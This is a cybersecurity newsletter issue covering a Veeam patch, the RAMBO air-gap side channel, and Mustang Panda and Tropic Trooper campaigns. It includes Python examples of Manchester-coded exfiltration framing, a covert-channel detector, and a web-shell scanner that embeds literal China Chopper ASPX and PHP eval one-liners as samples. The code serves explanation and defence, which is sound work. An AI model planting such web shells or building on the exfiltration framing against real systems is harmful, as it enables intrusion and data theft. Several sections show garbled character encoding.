They drew first blood 🔪🩸☠️

Sep 13 2024



Welcome to Gone Phishing, your weekly cybersecurity newsletter that leaves cybercriminals sleeping with the phishes 🐟🐠🐡

Patch of the Week! 🩹

First things first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the Week. Okay, that’s it… 😳

Congrats to Veeam, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

Redeem Veeam 🍀

🚨 Veeam Urgently Patches 18 Security Flaws! 🐞

Veeam has released updates to fix 18 security vulnerabilities, including five critical flaws that could allow remote code execution.

Key vulnerabilities include CVE-2024-40711 (CVSS 9.8) in Veeam Backup & Replication and CVE-2024-38650 (CVSS 9.9) in Veeam Service Provider Console; Veeam ONE is also affected by the batch. Users should update to the latest versions immediately, because backup infrastructure is a favourite target of ransomware crews: it holds the keys to recovery, and a compromised backup server lets an attacker destroy the one thing that would have let you refuse to pay.

Notably, Rapid7 reports that Veeam was exploited in over 20% of its incident response cases in 2024! ⚠️🚀🔒

Now, on to this week’s hottest cybersecurity news stories:

  • 🔪 New RAMBO attack steals data with RAM radio signals 📻

  • 🐼 Mustang Panda bamboozles Asia-Pacific govts w/ malware 👾

  • 🐉 Chinese hackers target human rights studies in Middle East

They drew first blood 🔪🩸☠️

🚨 New Side-Channel Attack 'RAMBO' Exploits Radio Signals from RAM 🖥️

A novel side-channel attack named RAMBO has been uncovered, leveraging radio signals emitted by a device’s random access memory (RAM) to exfiltrate sensitive data from air-gapped networks.

This technique was developed by Dr. Mordechai Guri, head of the Offensive Cyber Research Lab at Ben Gurion University in Israel. RAMBO uses software-generated radio signals to encode and transmit sensitive information, such as files, images, encryption keys, and biometric data, posing a significant threat to highly secure, isolated systems. 📡💾

⚙️ How RAMBO Works

Malware already running on the air-gapped machine cannot send anything over a network, so it turns the memory into a transmitter: it times bursts of memory read and write activity so that the electromagnetic emissions coming off the RAM rise and fall in a controlled pattern.

The bits to be leaked are Manchester-encoded onto those bursts. Every bit carries a level transition in its middle, which lets the receiver recover the clock and reject corrupted symbols, and keeps the transmission both covert and decodable.

On the receiving side, the attack relies on software-defined radio (SDR) hardware and a simple antenna placed within range of the compromised device. The SDR demodulates the intercepted signal, and the attacker translates the recovered symbols back into the original binary data.

This technique has been demonstrated on systems with Intel i7 3.6GHz CPUs and 16 GB RAM, achieving data exfiltration speeds of up to 1,000 bits per second. 📈🔑

๐Ÿ‘€ Exfiltration Capabilities of RAMBO

The RAMBO attack can leak various types of data, including keystrokes, documents, and biometric information.ย 

For example:

Keystrokes: Exfiltrated in real-time with 16 bits per key.

  • RSA Encryption Keys: A 4096-bit key can be exfiltrated in about 41.96 seconds at low speeds.

  • Small Files: Biometric data, images (.jpg), and documents (.txt, .docx) can be transmitted within 400 seconds at slower speeds and even faster at higher speeds.

The efficiency of RAMBO makes it capable of leaking relatively brief information over a short period, underscoring the risk it poses to air-gapped systems. ๐Ÿ“‰๐Ÿ—‚๏ธย 
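To make the encoding step concrete, here is an added example (our own illustration, not the Offensive Cyber Research Lab’s code) of a Manchester-coded frame of the kind a RAMBO-style transmitter would put on the air, with the matching receiver logic. The framing (an assumed sync word, a length byte and an XOR checksum) is our assumption for illustration; the ‘1’ symbols stand for bursts of memory activity and the ‘0’ symbols for idle memory.

```python
import math

# Added example, not the researchers' code. Framing below is an assumption.
PREAMBLE_BITS = "10101010"  # assumed sync word the receiver aligns on
MAX_PAYLOAD = 255           # one length byte per frame


def bytes_to_bits(data: bytes) -> str:
    return "".join(f"{b:08b}" for b in data)


def bits_to_bytes(bits: str) -> bytes:
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def manchester_encode(bits: str) -> str:
    # Each bit becomes two symbols with a transition in the middle
    # (IEEE 802.3 convention: 0 -> "10", 1 -> "01"). On the transmitter,
    # symbol '1' is a burst of RAM read/write activity, '0' is idle memory.
    return "".join("01" if b == "1" else "10" for b in bits)


def manchester_decode(symbols: str) -> str:
    # "00" or "11" can never occur inside valid data, so either one means the
    # receiver lost a symbol or a burst was corrupted by noise.
    if len(symbols) % 2:
        raise ValueError("odd number of symbols: frame truncated")
    bits = []
    for i in range(0, len(symbols), 2):
        pair = symbols[i:i + 2]
        if pair == "01":
            bits.append("1")
        elif pair == "10":
            bits.append("0")
        else:
            raise ValueError(f"clock violation at symbol {i}: {pair!r}")
    return "".join(bits)


def xor_checksum(data: bytes) -> int:
    c = 0
    for b in data:
        c ^= b
    return c


def build_frame(payload: bytes) -> str:
    """Transmitter side: sync word, 1-byte length, payload, 1-byte checksum."""
    if not 0 < len(payload) <= MAX_PAYLOAD:
        raise ValueError("payload must be 1..255 bytes per frame")
    body = bytes([len(payload)]) + payload + bytes([xor_checksum(payload)])
    return manchester_encode(PREAMBLE_BITS + bytes_to_bits(body))


def parse_frame(symbols: str) -> bytes:
    """Receiver side: align on the sync word, decode, verify length and checksum."""
    sync = manchester_encode(PREAMBLE_BITS)
    start = symbols.find(sync)          # leading idle symbols are skipped here
    if start < 0:
        raise ValueError("no sync word found")
    pos = start + len(sync)
    length = int(manchester_decode(symbols[pos:pos + 16]), 2)
    pos += 16
    payload_syms = symbols[pos:pos + 16 * length]
    check_syms = symbols[pos + 16 * length:pos + 16 * length + 16]
    if len(payload_syms) != 16 * length or len(check_syms) != 16:
        raise ValueError("frame truncated")
    payload = bits_to_bytes(manchester_decode(payload_syms))
    if int(manchester_decode(check_syms), 2) != xor_checksum(payload):
        raise ValueError("checksum mismatch")
    return payload


def exfil_seconds(payload_bytes: int, bits_per_second: float) -> float:
    """Air time for a payload at a given bit rate, framing overhead included."""
    frames = math.ceil(payload_bytes / MAX_PAYLOAD)
    total_bits = 8 * payload_bytes + frames * (len(PREAMBLE_BITS) + 16)
    return total_bits / bits_per_second


if __name__ == "__main__":
    frame = build_frame(b"-----BEGIN RSA PRIVATE KEY-----")   # constructed payload
    print(len(frame), "symbols on air ->", parse_frame("0000" + frame + "0000"))
    print(f"512-byte (4096-bit) key at 100 bps: {exfil_seconds(512, 100):.2f} s")
```

Two things worth noticing: the receiver never decodes the idle padding around a frame, because a run of ‘0’ symbols would otherwise show up as a clock violation, and a single flipped symbol anywhere in the frame is caught either by the decoder or by the checksum. The timing function shows why a 4096-bit key takes slightly longer than the raw 40.96 s at 100 bps: every frame pays for its sync word, length and checksum.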

๐Ÿ›ก๏ธ Potential Countermeasures

To mitigate the risk of RAMBO and similar side-channel attacks, the following countermeasures are recommended:

  • Red-Black Zone Restrictions: Enforce strict separation of sensitive data and general-use zones.

  • Intrusion Detection Systems (IDS): Monitor memory access at the hypervisor level.

  • Radio Jammers: Deploy jamming devices to disrupt unauthorized radio communications.

  • Faraday Cages: Use Faraday cages to block electromagnetic emissions from sensitive equipment.

These measures aim to minimize the attack surface and enhance the security of air-gapped networks against electromagnetic-based data exfiltration techniques. ๐Ÿ”’๐Ÿ›‘
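The IDS bullet above deserves a worked illustration of what a hypervisor-side monitor could actually look for. This added example (ours, not taken from the RAMBO paper) assumes memory-bus activity has already been sampled once per symbol period and thresholded into a string of ‘1’ (bus busy) and ‘0’ (idle) samples; the window size and thresholds are our assumptions. It exploits two properties of Manchester coding: the level never stays the same for more than two symbol periods, and the signal is high exactly half the time.

```python
# Added example, not from the RAMBO paper: a heuristic for Manchester-like
# memory activity in a binarised bandwidth trace. Sampling and thresholds are
# assumptions for illustration.


def manchester_encode(bits: str) -> str:
    # Used only to construct a realistic covert trace for the demo (0 -> "10", 1 -> "01").
    return "".join("01" if b == "1" else "10" for b in bits)


def run_lengths(samples: str) -> list:
    """Lengths of consecutive identical samples, e.g. "1100010" -> [2, 3, 1, 1]."""
    runs, count = [], 0
    for i, s in enumerate(samples):
        count += 1
        if i + 1 == len(samples) or samples[i + 1] != s:
            runs.append(count)
            count = 0
    return runs


def manchester_score(samples: str) -> dict:
    """Features that separate Manchester data from ordinary workloads:
    a maximum run of 2 symbols, a 50% duty cycle, at least one
    transition per bit (i.e. >= 0.5 per symbol)."""
    runs = run_lengths(samples)
    return {
        "max_run": max(runs),
        "duty_cycle": samples.count("1") / len(samples),
        "transitions_per_symbol": (len(runs) - 1) / len(samples),
    }


def looks_like_covert_channel(samples: str, window: int = 64) -> bool:
    # Slide a half-overlapping window so an alignment offset of one symbol
    # (the window rarely starts on a bit boundary) does not hide the frame.
    for start in range(0, len(samples) - window + 1, window // 2):
        m = manchester_score(samples[start:start + window])
        if (m["max_run"] <= 2
                and 0.45 <= m["duty_cycle"] <= 0.55
                and m["transitions_per_symbol"] >= 0.45):
            return True
    return False


# Constructed traces: a frame with idle padding, and a bursty "normal" workload.
COVERT_TRACE = "00000" + manchester_encode("0110100111001010" * 8) + "0000"
BENIGN_TRACE = ("1" * 9 + "0" * 3) * 12

if __name__ == "__main__":
    print("covert trace flagged:", looks_like_covert_channel(COVERT_TRACE))
    print("benign trace flagged:", looks_like_covert_channel(BENIGN_TRACE))
```

The caveat a practitioner should keep in mind: a plain square wave (some periodic benign activity toggling the bus every symbol period) has exactly the same run-length and duty-cycle profile as an all-zero Manchester stream, so a hit from this heuristic is a prompt to look closer, not proof of exfiltration.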

๐Ÿž๏ธ RAMBO in the Broader Threat Landscape

RAMBO joins a growing arsenal of unconventional data exfiltration techniques targeting air-gapped networks, often viewed as the last line of defense for protecting highly sensitive information.ย 

As with all side-channel attacks, the initial infection vector requires the air-gapped network to be compromised, which can occur through rogue insiders, malicious USB devices, or supply chain attacks.ย 

Once the malware is in place, these covert channels can be activated, enabling attackers to bypass traditional network defenses and exfiltrate critical data with stealth and precision. ๐Ÿšซ๐Ÿ’ป

Stay vigilant and employ robust security measures to safeguard against these evolving threats.

๐Ÿฆพย Master AI & ChatGPT for FREE in just 3 hours ๐Ÿคฏ

1 Million+ people have attended, and are RAVING about this AI Workshop.
Donโ€™t believe us? Attend it for free and see it for yourself.

Save your spot here. (100 free spots only)

Highly Recommended: ๐Ÿš€

Join this 3-hour Power-Packed Masterclass worth $399 for absolutely free and learn 20+ AI tools to become 10x better & faster at what you do

๐Ÿ‘‰Save your seatย  now (FREE for First 100)

๐Ÿ—“๏ธ Tomorrow | โฑ๏ธ 10 AM EST

In this Masterclass, youโ€™ll learn how to:

๐Ÿš€ Do quick excel analysis & make AI-powered PPTsย 
๐Ÿš€ Build your own personal AI assistant to save 10+ hours
๐Ÿš€ Become an expert at prompting & learn 20+ AI tools
๐Ÿš€ Research faster & make your life a lot simpler & moreโ€ฆ

๐Ÿ‘‰ Register here (Offer valid for First 100 people only)๐ŸŽ

Asia-Pacific Governments: Slow your Mustang down 🐼🐙🎸

🚨 Mustang Panda Ups Its Game with New Malware Tools! 🛠️

The cyber threat group known as Mustang Panda (or Earth Preta) is stepping up its attacks with a refined arsenal, according to Trend Micro. Mustang Panda, active in the Asia-Pacific region, is using a variety of new tools to steal data and deliver more dangerous malware. 🌏🕵️‍♂️

🔧 Key Tools and Tactics

  • PUBLOAD: A downloader linked to Mustang Panda since 2022, used to deliver the PlugX malware, and now spread by a worm called HIUPAN that carries PUBLOAD from machine to machine. 🪱💾

  • FDMTP & PTSOCKET: New tools dropped by PUBLOAD to widen the group’s exfiltration options, with FDMTP acting as a secondary control tool and PTSOCKET enabling multi-thread file transfers. 📤📊

  • DOWNBAIT & CBROVER: Part of a "fast-paced" spear-phishing campaign targeting countries like Myanmar, the Philippines, Vietnam, Singapore, Cambodia, and Taiwan. These tools help deliver further payloads like the PlugX remote access trojan (RAT). 🎯📩

๐Ÿ“ Data Theft

Mustang Panda is known for targeting government entities, stealing documents, spreadsheets, and presentations (.doc, .xls, .pdf, etc.) by compressing and exfiltrating them via FTP or custom programs. ๐Ÿ—‚๏ธ๐Ÿ•ต๏ธโ€โ™€๏ธ

๐Ÿ’ก Recent Findings

Palo Alto Networks Unit 42 highlighted Mustang Panda's crafty use of Visual Studio Code's reverse shell feature, showing their ongoing evolution in attack strategies. ๐Ÿ–ฅ๏ธ๐Ÿ”’

"Mustang Panda is rapidly advancing its techniques, making their attacks more complex and effective," say researchers. The group continues to refine its methods, including multi-stage malware chains and potentially exploiting cloud services for exfiltration. ๐ŸŒฉ๏ธ๐Ÿš€ย 

Stay alert! ๐Ÿšจ๐Ÿ”

All your news. None of the bias.

Be the smartest person in the room by reading 1440! Dive into 1440, where 3.5 million readers find their daily, fact-based news fix. We navigate through 100+ sources to deliver a comprehensive roundup from every corner of the internet – politics, global events, business, and culture, all in a quick, 5-minute newsletter. It's completely free and devoid of bias or political influence, ensuring you get the facts straight.

Subscribe to 1440 today.

Oh, the humanity! 🙃

🚨 Tropic Trooper Strikes Again! 🏝️

Government entities in the Middle East and Malaysia are under attack by Tropic Trooper, a cyber threat group active since 2011, and also known as APT23, Earth Centaur, KeyBoy, and Pirate Panda. This group is notorious for targeting sectors like government, healthcare, and high-tech industries in Taiwan, Hong Kong, and the Philippines. 🖥️🛡️

🎯 New Targets

Kaspersky detected Tropic Trooper’s activity in June 2024 when they found a new version of the China Chopper web shell on a public server running the Umbraco CMS. 🐍🌐 They are now targeting critical government entities in the Middle East, particularly those focused on human rights studies, marking a strategic shift for the group. 🏛️📊

🛠️ Attack Tools

The China Chopper web shell was implemented as a .NET module for the Umbraco CMS, which gave the attackers a foothold on the server. From there they deployed Crowdoor, a loader that is a variant of the SparrowDoor backdoor: it loads Cobalt Strike, maintains persistence, and harvests sensitive information. 🕵️‍♂️💻 To plant its web shells in the first place, Tropic Trooper exploits vulnerabilities in applications like Adobe ColdFusion and Microsoft Exchange Server. 🐞🔓

⚠️ Persistent Threat

Even after detection, Tropic Trooper adapted quickly, uploading new malware samples to evade security measures. 🛡️🔄 Their focus? A CMS publishing studies on human rights, specifically around the Israel-Hamas conflict, highlighting a deliberate and strategic target. 🌍✍️

Stay vigilant! 🚨🔒
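Web shells like China Chopper are a cheap thing to sweep for, so here is an added example (ours, not Kaspersky’s tooling) that scans web-root files for the classic one-line China Chopper forms. The signatures, the size heuristic and the constructed sample files are this example’s assumptions; note that the variant Kaspersky describes was a compiled .NET module, which a text scan like this would not catch on its own, so treat it as a complement to reviewing the modules the CMS actually loads.

```python
import re

# Added example, not vendor code. Signatures and sample files are assumptions.
SIGNATURES = {
    # ASPX/JScript one-liner: <%eval(Request.Item["pw"],"unsafe");%>
    "aspx-jscript-eval": re.compile(r'eval\s*\(\s*Request\s*(?:\.Item|\.Form|\.Params)?\s*\[', re.I),
    "aspx-jscript-unsafe": re.compile(r'eval\s*\([^)]*,\s*"unsafe"\s*\)', re.I),
    # PHP one-liner: <?php @eval($_POST['pw']);?>
    "php-eval-request": re.compile(r'@?eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[', re.I),
    # JSP variant executing a request parameter
    "jsp-runtime-exec": re.compile(r'Runtime\.getRuntime\(\)\.exec\s*\(\s*request\.getParameter', re.I),
}
MAX_SHELL_BYTES = 512   # a classic Chopper stub is far smaller than any real page


def scan_file(path: str, content: bytes):
    """Return a finding for one file, or None when no signature matches."""
    text = content.decode("utf-8", errors="replace")
    hits = [name for name, rx in SIGNATURES.items() if rx.search(text)]
    if not hits:
        return None
    return {
        "path": path,
        "signatures": hits,
        "size": len(content),
        # Tiny and (almost) single-line is the Chopper hallmark.
        "one_liner": len(content) <= MAX_SHELL_BYTES and text.count("\n") <= 2,
    }


def scan_tree(files: dict) -> list:
    """Scan a mapping of relative path -> file bytes (a stand-in for walking the web root)."""
    return [r for r in (scan_file(p, c) for p, c in sorted(files.items())) if r]


# Constructed web root: two shells and two benign files that mention eval/Request.
SAMPLE_WEBROOT = {
    "umbraco/assets/help.aspx": b'<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "media/cache.php": b"<?php @eval($_POST['z0']);?>",
    "views/Contact.aspx": b'<%@ Page Language="C#" %>\n<form runat="server">\n<%= Request.Form["name"] %>\n</form>\n',
    "scripts/app.js": b"function f(){ return eval(window.__data); }\n",
}

if __name__ == "__main__":
    for finding in scan_tree(SAMPLE_WEBROOT):
        print(finding["path"], finding["signatures"], "one-liner" if finding["one_liner"] else "")
```

Both planted shells are reported and both benign files, one using `Request.Form` without `eval` and one calling JavaScript `eval` with no request input, stay quiet. In a real sweep, pair the content scan with file-system timestamps and the web server’s access log: a POST-only file that nothing links to is the other half of the Chopper signature.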

Thatโ€™s all for this week, folks. Take care, itโ€™s a jungle out there ๐Ÿ๏ธ๐Ÿฆœ๐ŸŒŠย ๐Ÿฆ๐Ÿ’

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ๐Ÿ›ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐Ÿ“…

  • ๐Ÿ’ตCrypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐Ÿ†“

  • ๐Ÿ“ˆBitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐Ÿ‘พ

Let us know what you think.

So long and thanks for reading all the phish!
